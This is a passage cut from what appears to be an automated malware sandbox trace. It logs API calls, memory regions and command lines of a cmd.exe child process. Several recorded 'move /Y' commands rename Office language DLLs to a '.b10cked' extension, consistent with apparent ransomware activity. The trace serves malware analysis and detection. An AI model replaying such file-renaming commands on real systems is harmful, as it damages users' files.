returned 0x0 [0173.686] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", nBufferLength=0x104, lpBuffer=0x12f608, lpFilePart=0x12f3a0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", lpFilePart=0x12f3a0*="STINTL~1.TRX") returned 0x3c [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] SetErrorMode (uMode=0x0) returned 0x0 [0173.686] SetErrorMode (uMode=0x1) returned 0x0 [0173.686] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12f810, lpFilePart=0x12f3a0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x12f3a0*="STINTL.DLL.trx_dll.b10cked") returned 0x4a [0173.686] SetErrorMode (uMode=0x0) returned 0x1 [0173.686] SetLastError (dwErrCode=0x0) [0173.686] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll.b10cked")) returned 0xffffffff [0173.687] GetLastError () returned 0x2 [0173.687] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x12ed1c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ed1c) returned 0x1b2128 [0173.687] FindNextFileW (in: hFindFile=0x1b2128, lpFindFileData=0x12ed1c | out: lpFindFileData=0x12ed1c) returned 0 [0173.687] GetLastError () returned 0x12 [0173.687] FindClose (in: hFindFile=0x1b2128 | out: hFindFile=0x1b2128) returned 1 [0173.689] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x1b1cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1b1cb8) returned 0x1b2128 [0173.689] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x12efb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4a [0173.689] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x12efb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll", lpFilePart=0x0) returned 0x42 [0173.689] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll")) returned 0x2020 [0173.689] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\stintl.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.690] FindClose (in: hFindFile=0x1b2128 | out: hFindFile=0x1b2128) returned 1 [0173.690] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x12ef68 | out: _Buffer=" 1") returned 9 [0173.690] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.690] GetFileType (hFile=0x7) returned 0x2 [0173.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.856] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12eef4 | out: lpMode=0x12eef4) returned 1 [0173.856] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.856] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x12ef28 | out: lpConsoleScreenBufferInfo=0x12ef28) returned 1 [0173.856] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.857] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ef68 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.857] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x12ef4c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ef4c*=0x1a) returned 1 [0173.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.857] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.857] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.857] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.857] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.857] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.857] SetConsoleInputExeNameW () returned 0x1 [0173.857] GetConsoleOutputCP () returned 0x1b5 [0173.857] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.857] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.858] exit (_Code=0) Process: id = "304" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0xa60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23658 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23659 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 23660 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 23661 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23662 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23663 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23664 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23665 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23666 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 23667 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23790 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23791 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23792 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23793 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 23794 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 23795 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23796 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23797 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23798 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23799 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23800 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23801 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23802 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23803 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23804 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 23805 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23806 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23807 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23808 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23809 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23810 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23811 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 23812 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 23813 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Thread: id = 405 os_tid = 0xaf4 [0173.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fcdc | out: lpSystemTimeAsFileTime=0x26fcdc*(dwLowDateTime=0x9d6f9020, dwHighDateTime=0x1d440a9)) [0173.713] GetCurrentProcessId () returned 0xa60 [0173.713] GetCurrentThreadId () returned 0xaf4 [0173.713] GetTickCount () returned 0x32902 [0173.713] QueryPerformanceCounter (in: lpPerformanceCount=0x26fcd4 | out: lpPerformanceCount=0x26fcd4*=23050192536) returned 1 [0173.713] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.713] __set_app_type (_Type=0x1) [0173.714] __p__fmode () returned 0x76b331f4 [0173.714] __p__commode () returned 0x76b331fc [0173.714] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.714] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.714] GetCurrentThreadId () returned 0xaf4 [0173.714] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xaf4) returned 0x38 [0173.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.714] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fc6c | out: phkResult=0x26fc6c*=0x0) returned 0x2 [0173.714] VirtualQuery (in: lpAddress=0x26fca3, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.714] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.715] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fc3c, dwLength=0x1c | out: lpBuffer=0x26fc3c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.715] GetConsoleOutputCP () returned 0x1b5 [0173.715] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.715] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.715] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.716] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.716] GetEnvironmentStringsW () returned 0x3a0210* [0173.716] FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.716] GetEnvironmentStringsW () returned 0x3a0210* [0173.716] FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebdc | out: phkResult=0x26ebdc*=0x40) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0xa0, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x0, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.716] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.716] RegCloseKey (hKey=0x40) returned 0x0 [0173.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26ebdc | out: phkResult=0x26ebdc*=0x40) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x40, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x1, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x0, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x4, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x4) returned 0x0 [0173.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ebe4, lpData=0x26ebe8, lpcbData=0x26ebe0*=0x1000 | out: lpType=0x26ebe4*=0x0, lpData=0x26ebe8*=0x9, lpcbData=0x26ebe0*=0x1000) returned 0x2 [0173.717] RegCloseKey (hKey=0x40) returned 0x0 [0173.717] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.717] srand (_Seed=0x5b886389) [0173.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" [0173.717] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRR~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\VISBRRES.DLL.trx_dll.b10cked\"" [0173.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.718] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.718] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.718] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.718] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.718] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.718] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.718] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.718] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.718] GetEnvironmentStringsW () returned 0x3a2360* [0173.718] FreeEnvironmentStringsW (penv=0x3a2360) returned 1 [0173.718] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.718] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.718] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.718] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.718] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.719] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.719] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.719] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.719] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f9a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.719] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f9a8, lpFilePart=0x26f9a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f9a4*="Desktop") returned 0x18 [0173.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f724 | out: lpFindFileData=0x26f724) returned 0x3a09f0 [0173.719] FindClose (in: hFindFile=0x3a09f0 | out: hFindFile=0x3a09f0) returned 1 [0173.719] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.720] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.720] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.720] GetEnvironmentStringsW () returned 0x3a0210* [0173.720] FreeEnvironmentStringsW (penv=0x3a0210) returned 1 [0173.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.720] GetConsoleOutputCP () returned 0x1b5 [0173.720] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.720] GetUserDefaultLCID () returned 0x409 [0173.721] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, 